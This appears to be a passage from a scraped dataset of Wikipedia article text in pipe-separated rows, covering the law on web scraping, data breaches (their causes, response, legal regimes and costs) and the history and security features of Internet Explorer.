prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
112 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_breach | A data breach, also known as data leakage, is "the unauthorized exposure, disclosure, or loss of personal information". 1 Attackers have a variety of motives, from financial gain to political activism, political repression, and espionage. There are several technical root causes of data breaches, including accidental or intentional disclosure of information by insiders, loss or theft of unencrypted devices, hacking into a system by exploiting software vulnerabilities, and social engineering attacks such as phishing where insiders are tricked into disclosing information. Although prevention efforts by the company holding the data can reduce the risk of data breach, it cannot bring it to zero. The first reported breach was in 2002 and the number occurring each year has grown since then. A large number of data breaches are never detected. If a breach is made known to the company holding the data, post-breach efforts commonly include containing the breach, investigating its scope and cause, and notifications to people whose records were compromised, as required by law in many jurisdictions. Law enforcement agencies may investigate breaches, although the hackers responsible are rarely caught. Many criminals sell data obtained in breaches on the dark web. Thus, people whose personal data was compromised are at elevated risk of identity theft for years afterwards and a significant number will become victims of this crime. Data breach notification laws in many jurisdictions, including all states of the United States and European Union member states, require the notification of people whose data has been breached. Lawsuits against the company that was breached are common, although few victims receive money from them. There is little empirical evidence of economic harm to firms from breaches except the direct cost, although there is some evidence suggesting a temporary, short-term decline in stock price. A data breach is a violation of "organizational, regulatory, legislative or contractual" law or policy 2 that causes "the unauthorized exposure, disclosure, or loss of personal information". 1 Legal and contractual definitions vary. 3 2 Some researchers include other types of information, for example intellectual property or classified information. 4 However, companies mostly disclose breaches because it is required by law, 5 and only personal information is covered by data breach notification laws. 6 7 The first reported data breach occurred on 5 April 2002 8 when 250,000 social security numbers collected by the State of California were stolen from a data center. 9 Before the widespread adoption of data breach notification laws around 2005, the prevalence of data breaches is difficult to determine. Even afterwards, statistics per year cannot be relied on because data breaches may be reported years after they occurred, 10 or not reported at all. 11 Nevertheless, the statistics show a continued increase in the number and severity of data breaches that continues as of 2022 update . 12 In 2016, researcher Sasha Romanosky estimated that data breaches (excluding phishing) outnumbered other security breaches by a factor of four. 13 According to a 2020 estimate, 55 percent of data breaches were caused by organized crime, 10 percent by system administrators, 10 percent by end users such as customers or employees, and 10 percent by states or state-affiliated actors. 14 Opportunistic criminals may cause data breaches—often using malware or social engineering attacks, but they will typically move on if the security is above average. More organized criminals have more resources and are more focused in their targeting of particular data. 15 Both of them sell the information they obtain for financial gain. 16 Another source of data breaches are politically motivated hackers, for example Anonymous, that target particular objectives. 17 State-sponsored hackers target either citizens of their country or foreign entities, for such purposes as political repression and espionage. Often they use undisclosed zero-day vulnerabilities for which the hackers are paid large sums of money. 18 The Pegasus spyware—a no-click malware developed by the Israeli company NSO Group that can be installed on most cellphones and spies on the users' activity—has drawn attention both for use against criminals such as drug kingpin El Chapo as well as political dissidents, facilitating the murder of Jamal Khashoggi. 19 Despite developers' goal of delivering a product that works entirely as intended, virtually all software and hardware contains bugs. 20 If a bug creates a security risk, it is called a vulnerability. 21 22 23 Patches are often released to fix identified vulnerabilities, but those that remain unknown (zero days) as well as those that have not been patched are still liable for exploitation. 24 Both software written by the target of the breach and third party software used by them are vulnerable to attack. 22 The software vendor is rarely legally liable for the cost of breaches, thus creating an incentive to make cheaper but less secure software. 25 Vulnerabilities vary in their ability to be exploited by malicious actors. The most valuable allow the attacker to inject and run their own code (called malware), without the user being aware of it. 21 Some malware is downloaded by users via clicking on a malicious link, but it is also possible for malicious web applications to download malware just from visiting the website (drive-by download). Keyloggers, a type of malware that records a user's keystrokes, are often used in data breaches. 26 The majority of data breaches could have been averted by storing all sensitive information in an encrypted format. That way, physical possession of the storage device or access to encrypted information is useless unless the attacker has the encryption key. 27 Hashing is also a good solution for keeping passwords safe from brute-force attacks, but only if the algorithm is sufficiently secure. 28 Many data breaches occur on the hardware operated by a partner of the organization targeted—including the 2013 Target data breach and 2014 JPMorgan Chase data breach. 29 Outsourcing work to a third party leads to a risk of data breach if that company has lower security standards; in particular, small companies often lack the resources to take as many security precautions. 30 29 As a result, outsourcing agreements often include security guarantees and provisions for what happens in the event of a data breach. 30 Human causes of breach are often based on trust of another actor that turns out to be malicious. Social engineering attacks rely on tricking an insider into doing something that compromises the system's security, such as revealing a password or clicking a link to download malware. 31 Data breaches may also be deliberately caused by insiders. 32 One type of social engineering, phishing, 31 obtains a user's credentials by sending them a malicious message impersonating a legitimate entity, such as a bank, and getting the user to enter their credentials onto a malicious website controlled by the cybercriminal. Two-factor authentication can prevent the malicious actor from using the credentials. 33 Training employees to recognize social engineering is another common strategy. 34 Another source of breaches is accidental disclosure of information, for example publishing information that should be kept private. 35 36 With the increase in remote work and bring your own device policies, large amounts of corporate data is stored on personal devices of employees. Via carelessness or disregard of company security policies, these devices can be lost or stolen. 37 Technical solutions can prevent many causes of human error, such as encrypting all sensitive data, preventing employees from using insecure passwords, installing antivirus software to prevent malware, and implementing a robust patching system to ensure that all devices are kept up to date. 38 Although attention to security can reduce the risk of data breach, it cannot bring it to zero. Security is not the only priority of organizations, and an attempt to achieve perfect security would make the technology unusable. 39 Many companies hire a chief information security officer (CISO) to oversee the company's information security strategy. 40 To obtain information about potential threats, security professionals will network with each other and share information with other organizations facing similar threats. 41 Defense measures can include an updated incident response strategy, contracts with digital forensics firms that could investigate a breach, 42 cyber insurance, 43 7 and monitoring the dark web for stolen credentials of employees. 44 In 2024, the United States National Institute of Standards and Technology (NIST) issued a special publication, "Data Confidentiality: Identifying and Protecting Assets Against Data Breaches". 45 The NIST Cybersecurity Framework also contains information about data protection. 46 Other organizations have released different standards for data protection. 47 The architecture of a company's systems plays a key role in deterring attackers. Daswani and Elbayadi recommend having only one means of authentication, 48 avoiding redundant systems, and making the most secure setting default. 49 Defense in depth and distributed privilege (requiring multiple authentications to execute an operation) also can make a system more difficult to hack. 50 Giving employees and software the least amount of access necessary to fulfill their functions (principle of least privilege) limits the likelihood and damage of breaches. 48 51 Several data breaches were enabled by reliance on security by obscurity; the victims had put access credentials in publicly accessible files. 52 Nevertheless, prioritizing ease of use is also important because otherwise users might circumvent the security systems. 53 Rigorous software testing, including penetration testing, can reduce software vulnerabilities, and must be performed prior to each release even if the company is using a continuous integration continuous deployment model where new versions are constantly being rolled out. 54 The principle of least persistence 55 —avoiding the collection of data that is not necessary and destruction of data that is no longer necessary—can mitigate the harm from breaches. 56 57 58 The challenge is that destroying data can be more complex with modern database systems. 59 A large number of data breaches are never detected. 60 Of those that are, most breaches are detected by third parties; 61 62 others are detected by employees or automated systems. 63 Responding to breaches is often the responsibility of a dedicated computer security incident response team, often including technical experts, public relations, and legal counsel. 64 65 Many companies do not have sufficient expertise in-house, and subcontract some of these roles; 66 often, these outside resources are provided by the cyber insurance policy. 67 After a data breach becomes known to the company, the next steps typically include confirming it occurred, notifying the response team, and attempting to contain the damage. 68 To stop exfiltration of data, common strategies include shutting down affected servers, taking them offline, patching the vulnerability, and rebuilding. 69 Once the exact way that the data was compromised is identified, there is typically only one or two technical vulnerabilities that need to be addressed in order to contain the breach and prevent it from reoccurring. 70 A penetration test can then verify that the fix is working as expected. 71 If malware is involved, the organization must investigate and close all infiltration and exfiltration vectors, as well as locate and remove all malware from its systems. 72 If data was posted on the dark web, companies may attempt to have it taken down. 73 Containing the breach can compromise investigation, and some tactics (such as shutting down servers) can violate the company's contractual obligations. 74 Gathering data about the breach can facilitate later litigation or criminal prosecution, 75 but only if the data is gathered according to legal standards and the chain of custody is maintained. 76 Database forensics can narrow down the records involved, limiting the scope of the incident. 77 Extensive investigation may be undertaken, which can be even more expensive than litigation. 62 In the United States, breaches may be investigated by government agencies such as the Office for Civil Rights, the United States Department of Health and Human Services, and the Federal Trade Commission (FTC). 78 Law enforcement agencies may investigate breaches 79 although the hackers responsible are rarely caught. 80 Notifications are typically sent out as required by law. 81 Many companies offer free credit monitoring to people affected by a data breach, although only around 5 percent of those eligible take advantage of the service. 82 Issuing new credit cards to consumers, although expensive, is an effective strategy to reduce the risk of credit card fraud. 82 Companies try to restore trust in their business operations and take steps to prevent a breach from reoccurring. 83 After a data breach, criminals make money by selling data, such as usernames, passwords, social media or customer loyalty account information, debit and credit card numbers, 16 and personal health information (see medical data breach). 84 Criminals often sell this data on the dark web—parts of the internet where it is difficult to trace users and illicit activity is widespread—using platforms like .onion or I2P. 85 Originating in the 2000s, the dark web, followed by untraceable cryptocurrencies such as Bitcoin in the 2010s, made it possible for criminals to sell data obtained in breaches with minimal risk of getting caught, facilitating an increase in hacking. 86 87 One popular darknet marketplace, Silk Road, was shut down in 2013 and its operators arrested, but several other marketplaces emerged in its place. 88 Telegram is also a popular forum for illegal sales of data. 89 This information may be used for a variety of purposes, such as spamming, obtaining products with a victim's loyalty or payment information, identity theft, prescription drug fraud, or insurance fraud. 90 The threat of data breach or revealing information obtained in a data breach can be used for extortion. 16 Consumers may suffer various forms of tangible or intangible harm from the theft of their personal data, or not notice any harm. 91 A significant portion of those affected by a data breach become victims of identity theft. 82 A person's identifying information often circulates on the dark web for years, causing an increased risk of identity theft regardless of remediation efforts. 80 92 Even if a customer does not end up footing the bill for credit card fraud or identity theft, they have to spend time resolving the situation. 93 94 Intangible harms include doxxing (publicly revealing someone's personal information), for example medication usage or personal photos. 95 There is little empirical evidence of economic harm from breaches except the direct cost, although there is some evidence suggesting a temporary, short-term decline in stock price. 96 Other impacts on the company can range from lost business, reduced employee productivity due to systems being offline or personnel redirected to working on the breach, 97 resignation or firing of senior executives, 78 reputational damage, 78 98 and increasing the future cost of auditing or security. 78 Consumer losses from a breach are usually a negative externality for the business. 99 Some experts have argued that the evidence suggests there is not enough direct costs or reputational damage from data breaches to sufficiently incentivize their prevention. 100 101 Estimating the cost of data breaches is difficult, both because not all breaches are reported and also because calculating the impact of breaches in financial terms is not straightforward. There are multiple ways of calculating the cost to businesses, especially when it comes to personnel time dedicated to dealing with the breach. 102 Author Kevvie Fowler estimates that more than half the direct cost incurred by companies is in the form of litigation expenses and services provided to affected individuals, with the remaining cost split between notification and detection, including forensics and investigation. He argues that these costs are reduced if the organization has invested in security prior to the breach or has previous experience with breaches. The more data records involved, the more expensive a breach typically will be. 103 In 2016, researcher Sasha Romanosky estimated that while the mean breach cost around the targeted firm $5 million, this figure was inflated by a few highly expensive breaches, and the typical data breach was much less costly, around $200,000. Romanosky estimated the total annual cost to corporations in the United States to be around $10 billion. 104 The law regarding data breaches is often found in legislation to protect privacy more generally, and is dominated by provisions mandating notification when breaches occur. 105 Laws differ greatly in how breaches are defined, 3 what type of information is protected, the deadline for notification, 6 and who has standing to sue if the law is violated. 106 Notification laws increase transparency and provide a reputational incentive for companies to reduce breaches. 107 The cost of notifying the breach can be high if many people were affected and is incurred regardless of the company's responsibility, so it can function like a strict liability fine. 108 As of 2024 update , Thomas on Data Breach listed 62 United Nations member states that are covered by data breach notification laws. Some other countries require breach notification in more general data protection laws. 109 Shortly after the first reported data breach in April 2002, California passed a law requiring notification when an individual's personal information was breached. 9 In the United States, notification laws proliferated after the February 2005 ChoicePoint data breach, widely publicized in part because of the large number of people affected (more than 140,000) and also because of outrage that the company initially informed only affected people in California. 110 111 In 2018, the European Union's General Data Protection Regulation (GDPR) took effect. The GDPR requires notification within 72 hours, with very high fines possible for large companies not in compliance. This regulation also stimulated the tightening of data privacy laws elsewhere. 112 113 As of 2022 update , the only United States federal law requiring notification for data breaches is limited to medical data regulated under HIPAA, but all 50 states (since Alabama passed a law in 2018) have their own general data breach notification laws. 113 Measures to protect data from a breach are typically absent from the law or vague. 105 Filling this gap is standards required by cyber insurance, which is held by most large companies and functions as de facto regulation. 114 115 Of the laws that do exist, there are two main approaches—one that prescribes specific standards to follow, and the reasonableness approach. 116 The former is rarely used due to a lack of flexibility and reluctance of legislators to arbitrate technical issues; with the latter approach, the law is vague but specific standards can emerge from case law. 117 Companies often prefer the standards approach for providing greater legal certainty, but they might check all the boxes without providing a secure product. 118 An additional flaw is that the laws are poorly enforced, with penalties often much less than the cost of a breach, and many companies do not follow them. 119 Many class-action lawsuits, derivative suits, and other litigation have been brought after data breaches. 120 They are often settled regardless of the merits of the case due to the high cost of litigation. 121 122 Even if a settlement is paid, few affected consumers receive any money as it usually is only cents to a few dollars per victim. 78 122 Legal scholars Daniel J. Solove and Woodrow Hartzog argue that "Litigation has increased the costs of data breaches but has accomplished little else. 123 Plaintiffs often struggle to prove that they suffered harm from a data breach. 123 The contribution of a company's actions to a data breach varies, 119 124 and likewise the liability for the damage resulting for data breaches is a contested matter. It is disputed what standard should be applied, whether it is strict liability, negligence, or something else. 124 |
113 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Internet_Explorer | Internet Explorer a (formerly Microsoft Internet Explorer b and Windows Internet Explorer, c commonly abbreviated as IE or MSIE) is a retired series of graphical web browsers developed by Microsoft that were used in the Windows line of operating systems. While IE has been discontinued on most Windows editions, it remains supported on certain editions of Windows, such as Windows 10 LTSB LTSC. 6 Starting in 1995, it was first released as part of the add-on package Plus for Windows 95 that year. Later versions were available as free downloads or in-service packs and included in the original equipment manufacturer (OEM) service releases of Windows 95 and later versions of Windows. Microsoft spent over US$100 million per year on Internet Explorer in the late 1990s, 7 with over 1,000 people involved in the project by 1999. 8 9 New feature development for the browser was discontinued in 2016 10 and ended support on June 15, 2022 for Windows 10 Semi-Annual Channel (SAC), in favor of its successor, Microsoft Edge. Internet Explorer was once the most widely used web browser, attaining a peak of 95% usage share by 2003. 11 It has since fallen out of general use after retirement. This came after Microsoft used bundling to win the first browser war against Netscape, which was the dominant browser in the 1990s. Its usage share has since declined with the launches of Firefox (2004) and Google Chrome (2008) and with the growing popularity of mobile operating systems such as Android and iOS that do not support Internet Explorer. Microsoft Edge, IE's successor, first overtook Internet Explorer in terms of market share in November 2019. Versions of Internet Explorer for other operating systems have also been produced, including an Xbox 360 version called Internet Explorer for Xbox and for platforms Microsoft no longer supports: Internet Explorer for Mac and Internet Explorer for UNIX (Solaris and HP-UX), and an embedded OEM version called Pocket Internet Explorer, later rebranded Internet Explorer Mobile, made for Windows CE, Windows Phone, and, previously, based on Internet Explorer 7, for Windows Phone 7. The browser has been scrutinized throughout its development for its use of third-party technology (such as the source code of Spyglass Mosaic, used without royalty in early versions) and security and privacy vulnerabilities, and the United States and the European Union have determined that the integration of Internet Explorer with Windows has been to the detriment of fair browser competition. Internet Explorer 7 was supported on Windows Embedded Compact 2013 until October 10, 2023. 12 The core of Internet Explorer 11 will continue being shipped and supported until at least 2029 as IE Mode, a feature of Microsoft Edge, enabling Edge to display web pages using Internet Explorer 11's Trident layout engine and other components. 13 Through IE Mode, the underlying technology of Internet Explorer 11 partially exists on versions of Windows that do not support IE11 as a proper application, including newer versions of Windows 10, as well as Windows 11, Windows Server Insider Build 22463 and Windows Server Insider Build 25110. 14 The Internet Explorer project was started in the summer of 1994 by Thomas Reardon, 15 who, according to former project lead Ben Slivka, 16 used source code from Spyglass, Inc. Mosaic, which was an early commercial web browser with formal ties to the pioneering National Center for Supercomputing Applications (NCSA) Mosaic browser. 17 18 In late 1994, Microsoft licensed Spyglass Mosaic for a quarterly fee plus a percentage of Microsoft's non-Windows revenues for the software. 18 Although bearing a name like NCSA Mosaic, Spyglass Mosaic had used the NCSA Mosaic source code sparingly. 19 The first version, dubbed Microsoft Internet Explorer, was installed as part of the Internet Jumpstart Kit in the Microsoft Plus pack for Windows 95. 20 The Internet Explorer team began with about six people in early development. 19 21 Internet Explorer 1.5 was released several months later for Windows NT and added support for basic table rendering. By including it free of charge with their operating system, they did not have to pay royalties to Spyglass Inc, resulting in a lawsuit and a US$8 million settlement on January 22, 1997. 17 18 Microsoft was sued by SyNet Inc. in 1996, for trademark infringement, claiming it owned the rights to the name "Internet Explorer. 22 It ended with Microsoft paying $5 million to settle the lawsuit. 23 Internet Explorer 2 is the second major version of Internet Explorer, released on November 22, 1995, for Windows 95 and Windows NT, and on April 23, 1996, for Apple Macintosh 24 and Windows 3.1. 25 Internet Explorer 3 is the third major version of Internet Explorer, released on August 13, 1996, for Microsoft Windows and on January 8, 1997, for Apple Mac OS. Internet Explorer 4 is the fourth major version of Internet Explorer, released in September 1997 for Microsoft Windows, Mac OS, Solaris, and HP-UX. It was the first version of Internet Explorer to use the Trident web engine. Internet Explorer 5 is the fifth major version of Internet Explorer, released on March 18, 1999, for Windows 3.1, Windows NT 3, Windows 95, Windows NT 4.0 SP3, Windows 98, Mac OS X (up to v5.2.3), Classic Mac OS (up to v5.1.7), Solaris and HP-UX (up to 5.01 SP1). Internet Explorer 6 is the sixth major version of Internet Explorer, released on August 24, 2001, for Windows NT 4.0 SP6a, Windows 98, Windows 2000, Windows ME and as the default web browser for Windows XP and Windows Server 2003. Internet Explorer 7 is the seventh major version of Internet Explorer, released on October 18, 2006, for Windows XP SP2, Windows Server 2003 SP1 and as the default web browser for Windows Vista, Windows Server 2008 and Windows Embedded POSReady 2009. IE7 introduces tabbed browsing. Internet Explorer 8 is the eighth major version of Internet Explorer, released on March 19, 2009, for Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008 and as the default web browser for Windows 7 (later default was Internet Explorer 11) and Windows Server 2008 R2. Internet Explorer 9 is the ninth major version of Internet Explorer, released on March 14, 2011, for Windows 7, Windows Server 2008 R2, Windows Vista Service Pack 2 and Windows Server 2008 SP2 with the Platform Update. Internet Explorer 10 is the tenth major version of Internet Explorer, released on October 26, 2012, and is the default web browser for Windows 8 and Windows Server 2012. It became available for Windows 7 SP1 and Windows Server 2008 R2 SP1 in February 2013. Internet Explorer 11 is featured in Windows 8.1, Windows Server 2012 R2 and Windows RT 8.1, which was released on October 17, 2013. It includes an incomplete mechanism for syncing tabs. It is a major update to its developer tools, 26 27 enhanced scaling for high DPI screens, 28 HTML5 prerender and prefetch, 29 hardware-accelerated JPEG decoding, 30 closed captioning, HTML5 full screen, 31 and is the first Internet Explorer to support WebGL 32 33 34 and Google's protocol SPDY (starting at v3). 35 This version of IE has features dedicated to Windows 8.1, including cryptography (WebCrypto), 26 adaptive bitrate streaming (Media Source Extensions) 36 and Encrypted Media Extensions. 31 Internet Explorer 11 was made available for Windows 7 users to download on November 7, 2013, with Automatic Updates in the following weeks. 37 Internet Explorer 11's user agent string now identifies the agent as "Trident" (the underlying browser engine) instead of "MSIE. It also announces compatibility with Gecko (the browser engine of Firefox). Microsoft claimed that Internet Explorer 11, running the WebKit SunSpider JavaScript Benchmark, was the fastest browser as of October 15, 2013. 38 Internet Explorer 11 was made available for Windows Server 2012 and Windows Embedded 8 Standard, the only still supported edition of Windows 8 in April 2019. 39 Microsoft Edge was officially unveiled on January 21, 2015 as "Project Spartan. 40 41 On April 29, 2015, Microsoft announced that Microsoft Edge would replace Internet Explorer as the default browser in Windows 10. 42 However, Internet Explorer remained the default web browser on the Windows 10 Long Term Servicing Channel (LTSC) and on Windows Server until 2021, primarily for enterprise purposes. 43 44 45 46 Internet Explorer is still installed in Windows 10 to maintain compatibility with older websites and intranet sites that require ActiveX and other legacy web technologies. 40 41 The browser's MSHTML rendering engine also remains for compatibility reasons. Additionally, Microsoft Edge shipped with the "Internet Explorer mode" feature, which enables support for legacy internet applications. This is possible through use of the Trident MSHTML engine, the rendering code of Internet Explorer. 47 48 Microsoft has committed to supporting Internet Explorer mode at least through 2029, with a one-year notice before it is discontinued. 49 With the release of Microsoft Edge, the development of new features for Internet Explorer ceased. Internet Explorer 11 was the final release, and Microsoft began the process of deprecating Internet Explorer. During this process, it will still be maintained as part of Microsoft's support policies. 10 Since January 12, 2016, only the latest version of Internet Explorer available for each version of Windows has been supported. 50 51 At the time, nearly half of Internet Explorer users were using an unsupported version. 52 In February 2019, Microsoft Chief of Security Chris Jackson recommended that users stop using Internet Explorer as their default browser. 53 Various websites have dropped support for Internet Explorer. On June 1, 2020, the Internet Archive removed Internet Explorer from its list of supported browsers, due to the browser's dated nature. 54 Since November 30, 2020, the web version of Microsoft Teams can no longer be accessed using Internet Explorer 11, followed by the remaining Microsoft 365 applications since August 17, 2021. 55 56 WordPress also dropped support for the browser in July 2021. 57 Microsoft disabled the normal means of launching Internet Explorer in Windows 11 and later versions of Windows 10, 58 but it is still possible for users to launch the browser from the Control Panel's browser toolbar settings or via PowerShell. 59 On June 15, 2022, Internet Explorer 11 support ended for the Windows 10 Semi-Annual Channel (SAC). Users on these versions of Windows 10 were redirected to Microsoft Edge starting on February 14, 2023, and visual references to the browser (such as icons on the taskbar) would have been removed on June 13, 2023. However, on May 19, 2023 various organizations disapproved, leading Microsoft to withdraw the change. 60 61 Other versions of Windows that were still supported at the time were unaffected. Specifically, Windows 7 ESU, Windows 8.x, Windows RT; Windows Server 2008 R2 ESU, Windows Server 2012 R2 and later; and Windows 10 LTSB LTSC continued to receive updates until their respective end of life dates. 62 63 64 65 On other versions of Windows, Internet Explorer will still be supported until their own end of support dates. IE7 was supported until October 10, 2023 alongside the end of support for Windows Embedded Compact 2013, while IE9 was supported until January 9, 2024 alongside the end of ESU support for Azure customers on Windows Server 2008. 51 Barring additional changes to the support policy, Internet Explorer 11 will be supported until January 13, 2032, concurrent with the end of support for Windows 10 IoT Enterprise LTSC 2021. 66 51 Internet Explorer has been designed to view a broad range of web pages and provide certain features within the operating system, including Microsoft Update. During the height of the browser wars, Internet Explorer superseded Netscape only when it caught up technologically to support the progressive features of the time. 68 better source needed Internet Explorer, using the MSHTML (Trident) browser engine: Internet Explorer uses DOCTYPE sniffing to choose between standards mode and a "quirks mode" in which it deliberately mimics nonstandard behaviors of old versions of MSIE for HTML and CSS rendering on screen (Internet Explorer always uses standards mode for printing). It also provides its own dialect of ECMAScript called JScript. Internet Explorer was criticized by Tim Berners-Lee for its limited support for SVG, which is promoted by W3C. 72 Internet Explorer has introduced an array of proprietary extensions to many of the standards, including HTML, CSS, and the DOM. This has resulted in several web pages that appear broken in standards-compliant web browsers and has introduced the need for a "quirks mode" to allow for rendering improper elements meant for Internet Explorer in these other browsers. Internet Explorer has introduced several extensions to the DOM that have been adopted by other browsers. These include the inner HTML property, which provides access to the HTML string within an element, which was part of IE 5 and was standardized as part of HTML 5 roughly 15 years later after all other browsers implemented it for compatibility, 73 the XMLHttpRequest object, which allows the sending of HTTP request and receiving of HTTP response, and may be used to perform AJAX, and the designMode attribute of the content Document object, which enables rich text editing of HTML documents. citation needed Some of these functionalities were not possible until the introduction of the W3C DOM methods. Its Ruby character extension to HTML is also accepted as a module in W3C XHTML 1.1, though it is not found in all versions of W3C HTML. Microsoft submitted several other features of IE for consideration by the W3C for standardization. These include the 'behavior' CSS property, which connects the HTML elements with JScript behaviors (known as HTML Components, HTC), HTML TIME profile, which adds timing and media synchronization support to HTML documents (similar to the W3C XHTML SMIL), and the VML vector graphics file format. However, all were rejected, at least in their original forms; VML was subsequently combined with PGML (proposed by Adobe and Sun), resulting in the W3C-approved SVG format, one of the few vector image formats being used on the web, which IE did not support until version 9. 74 Other non-standard behaviors include: support for vertical text, but in a syntax different from W3C CSS3 candidate recommendation, support for a variety of image effects 75 and page transitions, which are not found in W3C CSS, support for obfuscated script code, in particular JScript.Encode, 76 as well as support for embedding EOT fonts in web pages. 77 Support for favicons was first added in Internet Explorer 5. 78 Internet Explorer supports favicons in PNG, static GIF and native Windows icon formats. In Windows Vista and later, Internet Explorer can display native Windows icons that have embedded PNG files. 79 80 Internet Explorer makes use of the accessibility framework provided in Windows. Internet Explorer is also a user interface for FTP, with operations similar to Windows Explorer. Internet Explorer 5 and 6 had a side bar for web searches, enabling jumps through pages from results listed in the side bar. 81 Pop-up blocking and tabbed browsing were added respectively in Internet Explorer 6 and Internet Explorer 7. Tabbed browsing can also be added to older versions by installing MSN Search Toolbar or Yahoo Toolbar. Internet Explorer caches visited content in the Temporary Internet Files folder to allow quicker access (or offline access) to previously visited pages. The content is indexed in a database file, known as Index.dat. Multiple Index.dat files exist which index different content—visited content, web feeds, visited URLs, cookies, etc. 82 Prior to IE7, clearing the cache used to clear the index but the files themselves were not reliably removed, posing a potential security and privacy risk. In IE7 and later, when the cache is cleared, the cache files are more reliably removed, and the index.dat file is overwritten with null bytes. Caching has been improved in IE9. 83 Internet Explorer is fully configurable using Group Policy. Administrators of Windows Server domains (for domain-joined computers) or the local computer can apply and enforce a variety of settings on computers that affect the user interface (such as disabling menu items and individual configuration options), as well as underlying security features such as downloading of files, zone configuration, per-site settings, ActiveX control behavior and others. Policy settings can be configured for each user and for each machine. Internet Explorer also supports Integrated Windows Authentication. Internet Explorer uses a componentized architecture built on the Component Object Model (COM) technology. It consists of several major components, each of which is contained in a separate dynamic-link library (DLL) and exposes a set of COM programming interfaces hosted by the Internet Explorer main executable, iexplore.exe: 84 Internet Explorer does not include any native scripting functionality. Rather, MSHTML.dll exposes an API that permits a programmer to develop a scripting environment to be plugged-in and to access the DOM tree. Internet Explorer 8 includes the bindings for the Active Scripting engine, which is a part of Microsoft Windows and allows any language implemented as an Active Scripting module to be used for client-side scripting. By default, only the JScript and VBScript modules are provided; third party implementations like ScreamingMonkey (for ECMAScript 4 support) can also be used. Microsoft also makes available the Microsoft Silverlight runtime that allows CLI languages, including DLR-based dynamic languages like IronPython and IronRuby, to be used for client-side scripting. Internet Explorer 8 introduced some major architectural changes, called loosely coupled IE (LCIE). LCIE separates the main window process (frame process) from the processes hosting the different web applications in different tabs (tab processes). A frame process can create multiple tab processes, each of which can be of a different integrity level, each tab process can host multiple web sites. The processes use asynchronous inter-process communication to synchronize themselves. Generally, there will be a single frame process for all web sites. In Windows Vista with protected mode turned on, however, opening privileged content (such as local HTML pages) will create a new tab process as it will not be constrained by protected mode. 86 Internet Explorer exposes a set of Component Object Model (COM) interfaces that allows add-ons to extend the functionality of the browser. 84 Extensibility is divided into two types: Browser extensibility and content extensibility. Browser extensibility involves adding context menu entries, toolbars, menu items or Browser Helper Objects (BHO). BHOs are used to extend the feature set of the browser, whereas the other extensibility options are used to expose that feature in the user interface. Content extensibility adds support for non-native content formats. 84 It allows Internet Explorer to handle new file formats and new protocols, e.g. WebM or SPDY. 84 In addition, web pages can integrate widgets known as ActiveX controls which run on Windows only but have vast potentials to extend the content capabilities; Adobe Flash Player and Microsoft Silverlight are examples. 84 Add-ons can be installed either locally, or directly by a web site. Since malicious add-ons can compromise the security of a system, Internet Explorer implements several safeguards. Internet Explorer 6 with Service Pack 2 and later feature an Add-on Manager for enabling or disabling individual add-ons, complemented by a "No Add-Ons" mode. Starting with Windows Vista, Internet Explorer and its BHOs run with restricted privileges and are isolated from the rest of the system. Internet Explorer 9 introduced a new component Add-on Performance Advisor. Add-on Performance Advisor shows a notification when one or more of installed add-ons exceed a pre-set performance threshold. The notification appears in the Notification Bar when the user launches the browser. Windows 8 and Windows RT introduce a Metro-style version of Internet Explorer that is entirely sandboxed and does not run add-ons at all. 87 In addition, Windows RT cannot download or install ActiveX controls at all; although existing ones bundled with Windows RT still run in the traditional version of Internet Explorer. 87 Internet Explorer itself can be hosted by other applications via a set of COM interfaces. This can be used to embed the browser functionality inside a computer program or create Internet Explorer shells. 84 Internet Explorer uses a zone-based security framework that groups sites based on certain conditions, including whether it is an Internet- or intranet-based site as well as a user-editable whitelist. Security restrictions are applied per zone; all the sites in a zone are subject to the restrictions. Internet Explorer 6 SP2 onwards uses the Attachment Execution Service of Microsoft Windows to mark executable files downloaded from the Internet as being potentially unsafe. Accessing files marked as such will prompt the user to make an explicit trust decision to execute the file, as executables originating from the Internet can be potentially unsafe. This helps in preventing the accidental installation of malware. Internet Explorer 7 introduced the phishing filter, which restricts access to phishing sites unless the user overrides the decision. With version 8, it also blocks access to sites known to host malware. Downloads are also checked to see if they are known to be malware-infected. In Windows Vista, Internet Explorer by default runs in what is called Protected Mode, where the privileges of the browser itself are severely restricted—it cannot make any system-wide changes. One can optionally turn this mode off, but this is not recommended. This also effectively restricts the privileges of any add-ons. As a result, even if the browser or any add-on is compromised, the damage the security breach can cause is limited. Patches and updates to the browser are released periodically and made available through the Windows Update service, as well as through Automatic Updates. Although security patches continue to be released for a range of platforms, most feature additions and security infrastructure improvements are only made available on operating systems that are in Microsoft's mainstream support phase. On December 16, 2008, Trend Micro recommended users switch to rival browsers until an emergency patch was released to fix a potential security risk which "could allow outside users to take control of a person's computer and steal their passwords. Microsoft representatives countered this recommendation, claiming that "0.02% of internet sites" were affected by the flaw. A fix for the issue was released the following day with the Security Update for Internet Explorer KB960714, on Microsoft Windows Update. 88 89 In 2010, Germany's Federal Office for Information Security, known by its German initials, BSI, advised "temporary use of alternative browsers" because of a "critical security 